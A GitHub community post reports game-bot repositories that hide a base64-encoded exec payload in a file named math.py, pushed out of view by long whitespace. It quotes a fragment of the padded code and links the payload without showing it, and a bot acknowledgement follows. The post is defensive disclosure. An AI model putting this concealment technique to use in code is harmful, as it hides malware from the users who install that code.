Github Rendering Vulnerability Used by Hackers

[h8d13]

Select Topic Area

Bug

Body

I have found many packages using some weird stuff to hide code in plain sight.

https://github.com/ngat02/hayday-farming/blob/main/math.py
Taken down !! Nice :)

https://github.com/corvin-rose/hayday-farm-bot/blob/master/math.py
Problem is there are 10's of them... This one's profile even links to a private website.

Thanks to Eric Parker https://www.youtube.com/watch?v=qgR88PEYXYE&t=70s
We now do know what it does behind the scenes!

The other side is figuring out the techniques used on the "front", github.

There are 10's of similar packages for many game automation, that look like viruses.

import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     import numpy as np


def dist(self, p1, p2):
    return np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)print('cvqciujl')

Is it because of markdown and hydration abuse ?
Also used math.py might be the reason?

Anyways. This would install requests, cryptography and fernet not ideal for a open cv bot.

When you actually paste the code into an IDE you find a
';'importbase64';'exec with a long string and that's never good.
If you're feeling crazy, this the b64 payload: https://pastebin.com/M8cps9iB

What is weird is that github seems to not be rendering this but delivering it regardless?

Also not a single virus scanner flags this?
Whats weird is that even if you do check the github carefully (I was just wondering why name a file "math") it looks normal. 99% sure this helps hide it from many safety checks.

I didn't go further into the reverse. Found many other duplicates of this for HayDay but also many other "patience" games labeled as working bots.
Worst part is they might even kind of work, while you're reversed shell'd you can have some wheat, maybe, perhaps. Also aimed for a younger audience, more prone to not realizing what is going on.

I did end up making one just for the fuck of it and hopefully to save some computer resets or worse.

https://github.com/h8d13/HayDay/blob/main/README.md

But ultimately there might be an issue with how the markdown is abused to look normal and could be replicated to any repo.

Sidenote: Also they are botting stars/forks for more downloads.

After a little more digging....

https://pastebin.com/6d8TPAZa

This show us the full technique used to hide the code.

Firefox even already gives off several warnings about the page yet none on the page.

About 300 errors of low level and 1 high:

Content-Security-Policy: The page’s settings blocked an inline script (script-src-elem) from being executed because it violates the following directive: “script-src https://github.githubassets.com” utils.js:42:10

It also uses a:

<href>https://github.com/codespaces/new/ngat02/hayday-farming/tree/main?resume=1

I'm guessing these are hotkeys to hide the code using a trigger event that is never triggered?

The hidden tags and react nodes seem like they could easily be flagged ?
This makes me think of 2010 SEO hacks where you'd put h2s everywhere hidden in a white banner xD

Real question now is how many packages have this in them... There is at least 3 clones of this one and some with screenshots. One of them with 26 stars and 10 "forks".

As you can see with the readme files of these projects, it's clearly botted contribs due to pattern being always hidden in math or any predefined system package, and with a whole project that looks legit before diving in.

My ultimate question is how this is exploited when ran in elevated env, because we already know it pings back somewhere due to request library, the other question is what it does on host.

I hope there is something GitHub devs are able to do about this. As this could affect any github user that uses contributed packages and due to the fact even however thorough you are, you just can't see it. :)

---

Last question is hwoo if they have been doing this for months qnd getting access to people's computers, what else does that open as an attack vector in js hydration? I unfortunately lack the skills to reverse it further.

[github-actions[bot]]

💬 Your Product Feedback Has Been Submitted 🎉

Thank you for taking the time to share your insights with us! Your feedback is invaluable as we build a better GitHub experience for all our users.

Here's what you can expect moving forward ⏩

• Your input will be carefully reviewed and cataloged by members of our product teams. 
  • Due to the high volume of submissions, we may not always be able to provide individual responses.
  • Rest assured, your feedback will help chart our course for product improvements.
• Other users may engage with your post, sharing their own perspectives or experiences. 
• GitHub staff may reach out for further clarification or insight. 
  • We may 'Answer' your discussion if there is a current solution, workaround, or roadmap/changelog post related to the feedback.

Where to look to see what's shipping 👀

• Read the Changelog for real-time updates on the latest GitHub features, enhancements, and calls for feedback.
• Explore our Product Roadmap, which details upcoming major releases and initiatives.

What you can do in the meantime 💻

• Upvote and comment on other user feedback Discussions that resonate with you.
• Add more information at any point! Useful details include: use cases, relevant labels, desired outcomes, and any accompanying screenshots.

As a member of the GitHub community, your participation is essential. While we can't promise that every suggestion will be implemented, we want to emphasize that your feedback is instrumental in guiding our decisions and priorities.

Thank you once again for your contribution to making GitHub even better! We're grateful for your ongoing support and collaboration in shaping the future of our platform. ⭐